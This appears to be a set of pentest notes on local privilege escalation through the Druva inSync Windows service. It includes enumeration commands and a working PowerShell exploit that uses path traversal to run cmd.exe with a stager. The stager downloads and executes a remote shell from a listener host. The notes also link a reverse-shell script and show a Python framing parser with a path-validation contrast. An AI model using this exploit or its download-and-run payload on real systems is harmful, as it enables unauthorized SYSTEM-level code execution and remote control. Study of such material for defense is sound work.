Vulnerable Services

Resources


Enumerating Installed Programs

wmic product get name

Enumerating Local Ports

netstat -ano | findstr 6064

Enumerating Process ID

get-process -Id 3324

Enumerating Running Service

get-service | ? {$_.DisplayName -like 'Druva*'}

Druva inSync PowerShell PoC

https://www.exploit-db.com/exploits/49211

$ErrorActionPreference = "Stop"

# Payload the service is asked to run (stager pulled from the listener host)
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3:8080/shell.ps1')"

# Connect to the inSync client service RPC port on localhost
$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

# Message framing: fixed header, 4-byte little-endian RPC type (5), 4-byte little-endian length, UTF-16LE command
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
# Path starts inside the inSync directory but traverses out to cmd.exe
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd")
$length = [System.BitConverter]::GetBytes($command.Length)

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
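As an added example (not part of this page or the exploit-db script), the framing the PoC sends, parsed back, next to the path validation a patched service must apply to the command field: a string-prefix comparison is satisfied by the `..` traversal above, while a check on the normalized path is not. The header, RPC type and directory constants are taken from the PoC; the prefix check is an assumption used to illustrate the bypass, not Druva's code, and `tool.exe` in the test is a placeholder name.

```python
import struct
from pathlib import PureWindowsPath

# Fixed framing used by the PoC above (constants taken from that script)
HEADER = b"inSync PHC RPCW[v0002]"
RPC_TYPE_EXEC = 5
INSYNC_DIR = PureWindowsPath(r"C:\ProgramData\Druva\inSync4")


def frame_rpc(command: str, rpc_type: int = RPC_TYPE_EXEC) -> bytes:
    """Header, 4-byte LE type, 4-byte LE byte length, UTF-16LE command."""
    body = command.encode("utf-16-le")
    return HEADER + struct.pack("<II", rpc_type, len(body)) + body


def parse_rpc(data: bytes) -> tuple:
    """Inverse of frame_rpc; rejects a bad header or a truncated body."""
    if not data.startswith(HEADER):
        raise ValueError("not an inSync RPCW message")
    off = len(HEADER)
    rpc_type, length = struct.unpack_from("<II", data, off)
    body = data[off + 8:off + 8 + length]
    if len(body) != length:
        raise ValueError("truncated command body")
    return rpc_type, body.decode("utf-16-le")


def executable_of(command: str) -> str:
    """First whitespace-delimited token: the program the service would launch."""
    return command.split(" ", 1)[0]


def naive_prefix_check(command: str) -> bool:
    """Assumed weak check: accepts anything that merely starts with the inSync directory."""
    return executable_of(command).lower().startswith(str(INSYNC_DIR).lower())


def normalized_check(command: str) -> bool:
    """Collapse '.' and '..' first, then require the resolved path to sit inside INSYNC_DIR."""
    p = PureWindowsPath(executable_of(command))
    if not p.anchor:  # relative paths are never inside the allowed directory
        return False
    parts = []
    for part in p.parts[1:]:
        if part == "..":
            if parts:
                parts.pop()
        elif part != ".":
            parts.append(part)
    resolved = PureWindowsPath(p.anchor, *parts)
    return INSYNC_DIR in resolved.parents
```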

Modifying the PowerShell execution policy

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Starting a Python Web Server

Catching a SYSTEM Shell
